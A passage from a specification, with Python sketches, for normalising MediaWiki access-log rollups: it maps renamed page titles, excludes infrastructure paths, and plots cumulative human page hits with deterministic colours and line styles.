and from infrastructure paths (e.g., /<root>-dir/load.php). Meta paths MUST NOT be merged into page paths.
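RP-7 can be sketched alongside RP-6: each raw path is classified as a meta-access path, a page path, or something else, and the path key itself is never decoded or rewritten. The root name `pub` matches the paths used elsewhere on this page. The function name, the class labels and the example meta class `history` are hypothetical.

```python
import re

ROOT = "pub"  # root used by the paths on this page (/pub/..., /pub-meta/..., /pub-dir/...)
META = re.compile(rf"^/{ROOT}-meta/([^/]+)/(.+)$")  # /<root>-meta/<meta_class>/<title>
PAGE = re.compile(rf"^/{ROOT}/(.+)$")               # /<root>/<title>


def classify_path(path):
    """Return (kind, detail) for a raw rollup path; the path string is not modified."""
    m = META.match(path)
    if m:
        return "meta", {"meta_class": m.group(1), "title": m.group(2)}
    m = PAGE.match(path)
    if m:
        return "page", {"title": m.group(1)}
    return "other", {}  # e.g. /pub-dir/load.php; never merged into page paths


# Made-up example paths
for p in ["/pub-meta/history/Main_Page", "/pub/Main_Page", "/pub-dir/load.php"]:
    print(p, classify_path(p))
```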

- RP-8 — Host separation is first-class

All computations MUST treat 'server_name' as part of the aggregation key. Cross-host merging MUST NOT occur unless explicitly requested, and if it occurs, it MUST be performed as a deliberate secondary operation with an explicit declaration.

Aggregation Semantics (Normative)

- RP-9 — Default aggregation key

Unless explicitly overridden, the aggregation key MUST be:

- (bucket_start, server_name, path)

- RP-10 — Collapsing across paths

If an analysis requires collapsing across paths (e.g., total throughput per host), the collapse MUST be performed by summing only total_bytes (and/or total_hits) over the chosen key-space. Collapsing MUST NOT recompute or “estimate” bytes from hit counts.

- RP-11 — Derivable totals are not recomputed

If agent/method/status counters exist, they MAY be used for classification analytics, but total_bytes MUST remain authoritative for bandwidth calculations and MUST NOT be reconstructed from sub-counters.
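RP-8 to RP-10 can be sketched with the standard library. Rows are summed under the default key `(bucket_start, server_name, path)`. A collapse to per-host throughput is a separate, explicit step that sums only `total_bytes` and `total_hits`, without estimating bytes from other counters. The function names and sample rows are hypothetical.

```python
from collections import defaultdict


def aggregate(rows):
    """RP-9 default key: (bucket_start, server_name, path); hosts are never merged (RP-8)."""
    acc = defaultdict(lambda: {"total_bytes": 0, "total_hits": 0})
    for r in rows:
        key = (r["bucket_start"], r["server_name"], r["path"])
        acc[key]["total_bytes"] += r["total_bytes"]
        acc[key]["total_hits"] += r["total_hits"]
    return dict(acc)


def collapse_paths(aggregated):
    """RP-10 deliberate collapse to (bucket_start, server_name) by summing totals only."""
    out = defaultdict(lambda: {"total_bytes": 0, "total_hits": 0})
    for (bucket, host, _path), tot in aggregated.items():
        out[(bucket, host)]["total_bytes"] += tot["total_bytes"]
        out[(bucket, host)]["total_hits"] += tot["total_hits"]
    return dict(out)


rows = [
    {"bucket_start": "2026-02-03T01:00Z", "server_name": "a.example", "path": "/pub/X", "total_bytes": 100, "total_hits": 2},
    {"bucket_start": "2026-02-03T01:00Z", "server_name": "a.example", "path": "/pub/Y", "total_bytes": 50, "total_hits": 1},
    {"bucket_start": "2026-02-03T01:00Z", "server_name": "b.example", "path": "/pub/X", "total_bytes": 70, "total_hits": 1},
]
per_host = collapse_paths(aggregate(rows))
print(per_host)
```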

Moving Average and Plotting (Normative)

- RP-12 — MA(3) definition

If a MA(3) overlay is requested, it MUST be computed as a simple trailing moving average over the time-ordered buckets:

- MA3[i] = (rate[i] + rate[i-1] + rate[i-2]) / 3

For i < 2, MA3 MUST be undefined (or omitted) rather than padded with fabricated values, unless explicitly instructed otherwise.

- RP-13 — Time ordering

Buckets MUST be ordered by bucket_start epoch ascending. Filesystem ordering and lexical ordering are insufficient unless validated by parsing bucket_start from filename.

- RP-14 — Missing buckets

If bucket windows are missing (gaps), MA(3) MUST NOT interpolate. It MUST operate on observed bucket series only, and any gaps SHOULD be represented explicitly in the plotted timeline if the plotting system supports it.
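The helper below makes gaps explicit for plotting without interpolating them. It assumes one-hour buckets (width 3600 s, matching the hourly buckets named under Temporal Aggregation) aligned to a common grid. MA(3) itself would still be computed on the observed values only.

```python
from __future__ import annotations

from typing import Optional


def timeline_with_gaps(observed: dict[int, float], width: int = 3600) -> list[tuple[int, Optional[float]]]:
    """Lay observed buckets on a regular grid; missing buckets become None, never interpolated values."""
    if not observed:
        return []
    starts = sorted(observed)
    if any((t - starts[0]) % width for t in starts):
        raise ValueError("bucket_start values are not aligned to the assumed width")
    return [(t, observed.get(t)) for t in range(starts[0], starts[-1] + width, width)]
```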

- RP-15 — Logarithmic axis precondition

If a logarithmic Y-axis is used, zero values MUST be handled deterministically:

- either omitted from log-scale plotting, or

- mapped via a declared epsilon policy (non-normative unless explicitly stated).

Zero-handling MUST NOT fabricate non-zero traffic.
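Both zero-handling options from RP-15 can be expressed in one helper. The default omits zeros. Passing an explicit `epsilon` applies a declared display policy. The parameter name is illustrative. Negative values are dropped here because RP-16 should already have rejected them upstream.

```python
from __future__ import annotations

from typing import Optional


def log_axis_points(points: list[tuple[int, float]], epsilon: Optional[float] = None) -> list[tuple[int, float]]:
    """Prepare (x, y) points for a log-scale Y axis (RP-15)."""
    out = []
    for x, y in points:
        if y > 0:
            out.append((x, y))
        elif y == 0 and epsilon is not None:
            out.append((x, epsilon))  # declared display policy only; the data value stays 0
        # y == 0 with no epsilon policy (or y < 0): omitted from the log plot
    return out
```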

Integrity (Normative)

- RP-16 — Non-negative integers

All parsed counters and total_bytes MUST be non-negative integers. Any negative or non-numeric value MUST trigger a deterministic rejection of that row (or file), as declared by the processing implementation.

- RP-17 — Deterministic parse errors

All parse failures MUST be deterministic and reproducible: given the same input TSV set, the same rows/files MUST be rejected, and rejection reasons MUST be auditable (e.g., logged).
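The sketch below rejects at row level, which RP-16 permits. It assumes each row is a dict of raw strings, such as `csv.DictReader(..., delimiter="\t")` would yield, and that the counter columns are `total_hits` and `total_bytes`. Other counters would be added to `COUNTER_FIELDS`. Rejection reasons are keyed by row number so that a rerun on the same input reproduces them exactly (RP-17).

```python
from __future__ import annotations

COUNTER_FIELDS = ("total_hits", "total_bytes")  # assumed counter columns


def validate_row(row: dict[str, str]) -> tuple[bool, str]:
    """Accept a row only if every counter is a non-negative base-10 integer (RP-16)."""
    for name in COUNTER_FIELDS:
        raw = row.get(name)
        if raw is None:
            return False, f"missing {name}"
        # isascii() guards against Unicode digits such as '²' that isdigit() accepts.
        if not (raw.isascii() and raw.isdigit()):
            return False, f"non-integer or negative {name}: {raw!r}"
    return True, "ok"


def partition_rows(rows: list[dict[str, str]]) -> tuple[list[dict[str, str]], list[tuple[int, str]]]:
    """Same input, same rejections, same reasons (RP-17); reasons are keyed by 1-based row number."""
    accepted, rejected = [], []
    for row_number, row in enumerate(rows, start=1):
        ok, reason = validate_row(row)
        if ok:
            accepted.append(row)
        else:
            rejected.append((row_number, reason))
    return accepted, rejected
```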

Path → Title Extraction

- A rollup record contributes to a page only if a title can be extracted by these rules:

- If path matches /pub/<title>, then <title> is the candidate.

- If path matches /pub-dir/index.php?<query>, the title MUST be taken from title=<title>.

- If title= is absent, page=<title> MAY be used.

- Otherwise, the record MUST NOT be treated as a page hit.

- URL fragments (#…) MUST be removed prior to extraction.
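The extraction rules can be sketched as follows. Query values are deliberately left URL-encoded, so that decoding happens exactly once as the first normalisation step. The text after `/pub/` is taken verbatim as the candidate. The function name is hypothetical.

```python
from __future__ import annotations

from typing import Optional


def extract_title(path: str) -> Optional[str]:
    """Return the raw (still URL-encoded) title candidate, or None if the record is not a page hit."""
    path = path.split("#", 1)[0]  # fragments are removed before extraction
    if path.startswith("/pub/"):
        return path[len("/pub/"):] or None
    script, _, query = path.partition("?")
    if script == "/pub-dir/index.php":
        params: dict[str, str] = {}
        for pair in query.split("&"):
            name, sep, value = pair.partition("=")
            if sep and name not in params:
                params[name] = value  # first occurrence wins; value left undecoded
        return params.get("title") or params.get("page") or None
    return None
```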

Title Normalisation

- URL decoding MUST occur before all other steps.

- Underscores (_) MUST be converted to spaces.

- UTF-8 dashes (–, —) MUST be converted to ASCII hyphen (-).

- Whitespace runs MUST be collapsed to a single space and trimmed.

- After normalisation, the title MUST exactly match a manifest title to remain eligible.

- Main Page SHALL be included in projections.

- Category:Cognitive Memoisation SHALL be included in projections.
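The normalisation steps map one-to-one onto the sketch below. The manifest is assumed to be an in-memory set of already-normalised titles, and the function names are hypothetical.

```python
from __future__ import annotations

import re
from typing import Optional
from urllib.parse import unquote


def normalise_title(raw: str) -> str:
    title = unquote(raw)                                           # 1. URL-decode first
    title = title.replace("_", " ")                                # 2. underscores -> spaces
    title = title.replace("\u2013", "-").replace("\u2014", "-")    # 3. en/em dash -> ASCII hyphen
    return re.sub(r"\s+", " ", title).strip()                      # 4. collapse whitespace, trim


def eligible_title(raw: str, manifest_titles: set[str]) -> Optional[str]:
    """Return the normalised title only if it exactly matches a manifest title."""
    title = normalise_title(raw)
    return title if title in manifest_titles else None
```

For example, the former path `Authority_Inversion:_A_Structural_Failure_in_Human%E2%80%93AI_Systems` (an encoded en dash) normalises to `Authority Inversion: A Structural Failure in Human-AI Systems`.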

Renamed page/title treatments

Ignore Pages

Ignore the following pages:

- DOI-master .* (deleted)

- Cognitive Memoisation library (old)

Normalisation Overview

The following lists the page renames, redirects and mappings that appear in the MediaWiki web-farm nginx access logs and rollups.

MediaWiki pages

- All MediaWiki URLs that contain an underscore (_) can be mapped to a page title by substituting a space ( ) for each underscore.

- URLs may also be URL-encoded.

- MediaWiki rewrites page URLs to /pub/<title>.

- MediaWiki uses /pub-dir/index.php? query parameters to refer to <title>.

- In MediaWiki, the normalised resource part of a URL path and the normalised value of a parameter such as title=<title> or edit=<title> identify the same target page.

curator action

Some former page titles contained en dashes, em dashes or similar UTF-8 dash characters.

- Dash rendering: the en dash (–), em dash (—) and similar UTF-8 dashes were replaced with the ASCII hyphen (-).

renamed pages (under curation)

- First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2) (redirected from):

- Cognitive_Memoisation_(CM-2):_A_Human-Governed_Protocol_for_Knowledge_Governance_and_Transport_in_AI_Systems)

- Cognitive Memoisation (CM-2) Protocol was formerly:

- Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration

- Let's_Build_a_Ship_-_Cognitive_Memoisation_for_Governing_Knowledge_in_Human_-_AI_Collabortion

- Cognitive_Memoisation_for_Governing_Knowledge_in_Human-AI_Collaboration

- Cognitive_Memoisation_for_Governing_Knowledge_in_Human–AI_Collaboration

- Cognitive_Memoisation_for_Governing_Knowledge_in_Human_-_AI_Collaboration

- Authority Inversion: A Structural Failure in Human-AI Systems was formerly:

- Authority_Inversion:_A_Structural_Failure_in_Human–AI_Systems

- Authority_Inversion:_A_Structural_Failure_in_Human-AI_Systems

- Journey: Human-Led Convergence in the Articulation of Cognitive Memoisation was formerly:

- Journey:_Human–Led_Convergence_in_the_Articulation_of_Cognitive_Memoisation (em dash)

- Cognitive Memoisation Corpus Map was formerly:

- Cognitive_Memoisation:_corpus_guide

- Cognitive_Memoisation:_corpus_guide'

- Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration (CM-1) was formerly:

- Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human–AI_Collaboration

- Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human–AI_Collaborationn

- Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human-AI_Collaboration

- Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human-AI_Collaborationn

- Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human_-_AI_Collaboration

- Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human_–_AI_Collaboration

- Progress Without Memory: Cognitive Memoisation as a Knowledge-Engineering Pattern for Stateless LLM Interaction was formerly:

- Progress_Without_Memory:_Cognitive_Memoisation_as_a_Knowledge_Engineering_Pattern_for_Stateless_LLM_Interaction

- Progress_Without_Memory:_Cognitive_Memoisation_as_a_Knowledge-Engineering_Pattern_for_Stateless_LLM_Interaction

- Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation'

- Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation

- Cognitive_Memorsation:_Plain-Language_Summary_(For_Non-Technical_Readers)'

- What Can Humans Trust LLM AI to Do? has been emitted in the rollups and in the verification output.tsv as 'What Can Humans Trust LLM AI to Do' (without the ?) because of incorrect path processing in the Perl code.

- Both forms are to be treated as the same title/publication.

Wiki Farm Canonicalisation (Mandatory)

- Each MediaWiki instance in a farm is identified by a (vhost, root) pair.

- Each instance exposes paired URL forms:

- /<x>/<Title>

- /<x-dir>/index.php?title=<Title>

- For the bound vhost:

- /<x>/ and /<x-dir>/index.php MUST be treated as equivalent roots.

- All page hits MUST be folded to a single canonical resource per title.

- Canonical resource key:

- (vhost, canonical_title)

Resource Extraction Order (Mandatory)

- URL-decode the request path.

- Extract title candidate:

- If path matches ^/<x>/<title>, extract <title>.

- If path matches ^/<x-dir>/index.php?<query>:

- Use title=<title> if present.

- Else MAY use page=<title> if present.

- Otherwise the record is NOT a page resource.

- Canonicalise title:

- "_" → space

- UTF-8 dashes (–, —) → "-"

- Collapse whitespace

- Trim leading/trailing space

- Apply namespace exclusions.

- Apply infrastructure exclusions.

- Apply canonical folding.

- Aggregate.

Infrastructure Exclusions (Mandatory)

Exclude:

- /

- /robots.txt

- Any path containing "sitemap"

- Any path containing /resources or /resources/

- /<x-dir>/index.php

- /<x-dir>/load.php

- /<x-dir>/api.php

- /<x-dir>/rest.php/v1/search/title

Exclude static resources by extension:

- .png .jpg .jpeg .gif .svg .ico .webp
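The exclusion list can be written as a single predicate over the raw request path. Two points are assumptions rather than statements of the source. First, the "sitemap" match is case-insensitive, following the "any case" wording in the Noise list. Second, the bare /<x-dir>/index.php is excluded only when it carries no title= or page= parameter, because the index.php?title=<Title> form is a page form under Wiki Farm Canonicalisation.

```python
from __future__ import annotations

STATIC_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico", ".webp")


def is_infrastructure(path: str, x_dir: str = "pub-dir") -> bool:
    """True if the request path falls under the infrastructure exclusions."""
    script, _, query = path.split("#", 1)[0].partition("?")
    if script in ("/", "/robots.txt"):
        return True
    if "sitemap" in path.lower():
        return True
    if "/resources" in path:
        return True
    if script in (f"/{x_dir}/load.php", f"/{x_dir}/api.php", f"/{x_dir}/rest.php/v1/search/title"):
        return True
    if script == f"/{x_dir}/index.php":
        # Assumption: only bare index.php is excluded; index.php?title=... / page=... is a page form.
        names = {pair.partition("=")[0] for pair in query.split("&") if "=" in pair}
        return not names & {"title", "page"}
    return script.lower().endswith(STATIC_EXTENSIONS)
```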

Order of normalisation (mandatory)

The following is the correct algorithm and the only compliant order of operations under these invariants:

- Load corpus manifest

- Normalise manifest titles → build the canonical key set

- Build a rename map that maps aliases → manifest keys (not to free-form strings)

When the verification output.tsv is available:

- Process output.tsv:

- normalise raw resource

- apply rename map → must resolve to a manifest key

- if it doesn’t resolve, it is out of domain

- Aggregate strictly by manifest key.

- Project.

Anything else is non-compliant.
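The key point of this order is that rename targets are manifest keys, so an alias either resolves into the manifest domain or the resource is out of domain. The sketch below assumes the manifest and the curated renames are already in memory. The function names are hypothetical. The `renames` dict used to exercise it would be populated from entries such as the corpus guide rename and the question-mark case listed above.

```python
from __future__ import annotations

import re
from typing import Optional
from urllib.parse import unquote


def normalise(raw: str) -> str:
    """Same steps as Title Normalisation: decode, '_' -> space, UTF-8 dashes -> '-', collapse whitespace."""
    title = unquote(raw).replace("_", " ").replace("\u2013", "-").replace("\u2014", "-")
    return re.sub(r"\s+", " ", title).strip()


def build_rename_map(renames: dict[str, str], manifest_keys: set[str]) -> dict[str, str]:
    """Map each normalised alias to a manifest key; a target outside the manifest is an error."""
    rename_map: dict[str, str] = {}
    for alias, target in renames.items():
        key = normalise(target)
        if key not in manifest_keys:
            raise ValueError(f"rename target {target!r} is not a manifest key")
        rename_map[normalise(alias)] = key
    return rename_map


def resolve(raw_resource: str, manifest_keys: set[str], rename_map: dict[str, str]) -> Optional[str]:
    """Return the manifest key for a raw resource, or None if it is out of domain."""
    title = normalise(raw_resource)
    title = rename_map.get(title, title)
    return title if title in manifest_keys else None
```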

Accumulated human_get time series (projection)

Eligible Resource Set (Corpus Titles)

- The eligible title set MUST be derived exclusively from corpus/manifest.tsv.

- Column 1 of manifest.tsv is the authoritative MediaWiki page title.

- Only titles present in the manifest (after normalisation) are eligible for projection.

- Titles present in the manifest MUST be included in the projection domain even if they receive zero hits in the period.

- Titles not present in the manifest MUST be excluded even if traffic exists.
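The sketch below reads column 1 of manifest.tsv and builds a zero-filled projection domain. It takes the file's text as a string for testability; in practice this could come from `open("corpus/manifest.tsv", encoding="utf-8").read()`. Whether the manifest has a header row is not stated here, so that is a parameter. Titles would also pass through the Title Normalisation steps before matching.

```python
from __future__ import annotations

import csv
import io


def manifest_titles(tsv_text: str, has_header: bool = False) -> list[str]:
    """Column 1 of manifest.tsv, in file order; blank rows are skipped."""
    rows = list(csv.reader(io.StringIO(tsv_text), delimiter="\t", quoting=csv.QUOTE_NONE))
    if has_header:
        rows = rows[1:]
    return [row[0] for row in rows if row and row[0].strip()]


def projection_domain(titles: list[str], hits: dict[str, int]) -> dict[str, int]:
    """Every manifest title appears (zero if unseen); traffic for non-manifest titles is dropped."""
    return {title: hits.get(title, 0) for title in titles}
```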

Noise and Infrastructure Exclusions

- The following MUST be excluded prior to aggregation:

- Special:, Category:, Category talk:, Talk:, User:, User talk:, File:, Template:, Help:, MediaWiki:

- /resources/, /pub-dir/load.php, /pub-dir/api.php, /pub-dir/rest.php

- /robots.txt, /favicon.ico

- sitemap (any case)

- Static resources by extension (.png, .jpg, .jpeg, .gif, .svg, .ico, .webp)
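The namespace exclusions can be applied to normalised titles as a prefix test. Title Normalisation separately states that Category:Cognitive Memoisation SHALL be included in projections. This sketch therefore carries that page as an explicit exception to the Category: exclusion. That reading of how the two rules interact is an assumption.

```python
EXCLUDED_NAMESPACES = (
    "Special:", "Category:", "Category talk:", "Talk:", "User:",
    "User talk:", "File:", "Template:", "Help:", "MediaWiki:",
)
# Title Normalisation requires this page to be included, so it is an explicit exception.
ALWAYS_INCLUDED = frozenset({"Category:Cognitive Memoisation"})


def is_excluded_namespace(title: str) -> bool:
    """Apply namespace exclusions to a normalised title (spaces, not underscores)."""
    if title in ALWAYS_INCLUDED:
        return False
    return title.startswith(EXCLUDED_NAMESPACES)
```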

Temporal Aggregation

- Hourly buckets MUST be aggregated into daily totals per title.

- Accumulated value per title is defined as:

- cum_hits(title, day_n) = Σ daily_hits(title, day_0 … day_n)

- Accumulation MUST be monotonic and non-decreasing.
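The sketch below folds hourly buckets into daily totals and then accumulates them. It assumes input triples of (bucket_start epoch, title, hits) and UTC day boundaries; neither the triple layout nor the time zone is fixed by the text above. Because hits are non-negative (RP-16), the running sum is monotonic non-decreasing. A contiguous day axis, from the earliest to the latest available day, can be passed as `all_days`.

```python
from __future__ import annotations

from collections import defaultdict
from datetime import date, datetime, timezone
from itertools import accumulate
from typing import Iterable


def daily_totals(hourly: Iterable[tuple[int, str, int]]) -> dict[str, dict[date, int]]:
    """Fold (bucket_start epoch, title, hits) hourly rows into per-title daily totals (UTC days)."""
    days: dict[str, dict[date, int]] = defaultdict(lambda: defaultdict(int))
    for epoch, title, hits in hourly:
        day = datetime.fromtimestamp(epoch, tz=timezone.utc).date()
        days[title][day] += hits
    return {title: dict(per_day) for title, per_day in days.items()}


def cumulative(per_day: dict[date, int], all_days: list[date]) -> list[int]:
    """cum_hits(title, day_n): running sum over the shared day axis; days without hits add 0."""
    return list(accumulate(per_day.get(day, 0) for day in all_days))
```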

Axis and Scale Invariants

- X axis: calendar date from earliest to latest available day.

- Major ticks every 7 days.

- Minor ticks every day.

- Date labels MUST be rotated (oblique) for readability.

- Y axis MUST be logarithmic.

- Zero or negative values MUST NOT be plotted on the log axis.

Legend Ordering

- Legend entries MUST be ordered by descending final accumulated human_get_ok.

- Ordering MUST be deterministic and reproducible.
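Deterministic ordering needs a tie-breaker for titles with equal final totals. The source does not name one, so this sketch breaks ties by title in ascending order. That choice is an assumption.

```python
from __future__ import annotations


def legend_order(final_totals: dict[str, int]) -> list[str]:
    """Titles by descending final accumulated human_get_ok; ties fall back to title order."""
    return sorted(final_totals, key=lambda title: (-final_totals[title], title))
```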

Visual Disambiguation Invariants

- Each title MUST be visually distinguishable.

- The same colour MAY be reused.

- The same line style MAY be reused.

- The same (colour + line style) pair MUST NOT be reused.

- Markers MAY be omitted or reused but MUST NOT be relied upon as the sole distinguishing feature.
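The "no reused (colour + line style) pair" invariant can be checked mechanically before plotting. This sketch assumes colours are recorded as tab20 indices and line styles as Matplotlib shorthand strings such as "-" or "--".

```python
from __future__ import annotations


def check_unique_pairs(styles: dict[str, tuple[int, str]]) -> None:
    """Raise if any (colour index, line style) pair is assigned to more than one title."""
    seen: dict[tuple[int, str], str] = {}
    for title, pair in styles.items():
        if pair in seen:
            raise ValueError(f"{title!r} reuses {pair} already assigned to {seen[pair]!r}")
        seen[pair] = title
```

Reusing a colour with a different line style, or a line style with a different colour, passes the check, as the invariants allow.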

Rendering Constraints

- Legend MUST be placed outside the plot area on the right.

- Sufficient vertical and horizontal space MUST be reserved to avoid label overlap.

- Line width SHOULD be consistent across series to avoid implied importance.

Interpretive Constraint

- This projection indicates reader entry and navigation behaviour only.

- High lead-in ranking MUST NOT be interpreted as quality, authority, or endorsement.

- Ordering reflects accumulated human access, not epistemic priority.

Periodic Regeneration

- This projection is intended to be regenerated periodically.

- Cross-run comparisons MUST preserve all invariants to allow valid temporal comparison.

- Changes in lead-in dominance (e.g. Plain-Language Summary vs. CM-1 foundation paper) are observational signals only and do not alter corpus structure.

Metric Definition

- The only signal used is human_get_ok.

- Non-human classifications MUST NOT be included.

- No inference from other status codes or agents is permitted.

Corpus Lead-In Projection: Deterministic Colour Map

This table provides the visual encoding for the core corpus pages. For titles not included in the colour map, use colours at your discretion until a Colour Map entry exists.

Colours are drawn from the Matplotlib tab20 palette.

Line styles are assigned to ensure that no (colour + line-style) pair is reused. Legend ordering is governed separately by accumulated human GET_ok.

Corpus Lead-In Projection: Colour-Map Hardening Invariants

This section hardens the visual determinism of the Corpus Lead-In Projection while allowing controlled corpus growth.

Authority

- This Colour Map is authoritative for all listed corpus pages.

- The assisting system MUST NOT invent, alter, or substitute colours or line styles for listed pages.

- Visual encoding is a governed property, not a presentation choice.

Page Labels

- Page labels must be normalised and then mapped to human-readable titles.

- Titles must not be duplicated.

- Some titles are mapped because the page was renamed.

- Do not show the prior name; always show the later name in the projection (e.g. Corpus guide → Corpus Map).

Binding Rule

- For any page listed in the Deterministic Colour Map table:

- The assigned (colour index, colour hex, line style) triple MUST be used exactly.

- Deviation constitutes a projection violation.

Legend Ordering Separation

- Colour assignment and legend ordering are orthogonal.

- Legend ordering MUST continue to follow the accumulated human GET_ok invariant.

- Colour assignment MUST NOT be influenced by hit counts, rank, or ordering.

New Page Admission Rule

- Pages not present in the current Colour Map MUST still appear in the projection.

- New pages MUST be assigned styles in strict sequence order:

- Iterate line style first, then colour index, exactly as defined in the base palette.

- Previously assigned pairs MUST NOT be reused.

- The assisting system MUST NOT reshuffle existing assignments to “make space”.
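The admission rule can be sketched as a fixed candidate sequence from which new pages take the next unused pair. The base order of line styles below is an assumption. So is the reading of "iterate line style first" as "line style varies fastest within each colour index". Colour indices 0 to 19 correspond to the 20 colours of tab20.

```python
from __future__ import annotations

from typing import Iterator

LINE_STYLES = ("-", "--", "-.", ":")  # assumed base order of line styles
N_COLOURS = 20                        # tab20 has 20 colours (indices 0..19)


def candidate_pairs() -> Iterator[tuple[int, str]]:
    """Line style varies fastest, then colour index (one reading of 'line style first')."""
    for colour in range(N_COLOURS):
        for style in LINE_STYLES:
            yield colour, style


def admit(new_titles: list[str], existing: dict[str, tuple[int, str]]) -> dict[str, tuple[int, str]]:
    """Give each new title the next unused pair; existing assignments are never touched."""
    assigned = dict(existing)
    used = set(existing.values())
    free = (pair for pair in candidate_pairs() if pair not in used)
    for title in new_titles:
        if title in assigned:
            continue
        pair = next(free, None)
        if pair is None:
            raise RuntimeError("all (colour, line style) pairs are in use")
        assigned[title] = pair
        used.add(pair)
    return assigned
```

Because `existing` is copied rather than modified and its pairs are skipped, no prior assignment is ever reshuffled to make space.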

Provisional Encoding Rule

- Visual assignments for newly admitted pages are **provisional** until recorded.